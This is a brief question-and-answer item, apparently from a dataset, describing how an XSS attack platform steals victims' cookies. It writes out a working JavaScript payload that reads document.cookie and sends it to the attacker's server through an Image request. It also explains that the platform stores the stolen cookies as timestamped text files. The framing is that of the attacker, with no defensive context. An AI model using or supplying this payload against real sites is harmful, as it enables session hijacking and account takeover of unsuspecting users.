How can an attacker retrieve a victim's cookies using the JavaScript payload from this XSS platform?

The platform serves an `index.js` file that, when loaded by the victim's browser, reads `document.cookie` and sends it to the server via an `Image` object (GET request) to avoid cross-origin issues. For example: `new Image().src = serverUrl + '?cookie=' + escape(document.cookie)`. The platform then saves the cookie data as a timestamped `.txt` file. This technique is part of the XSS platform's modular functionality.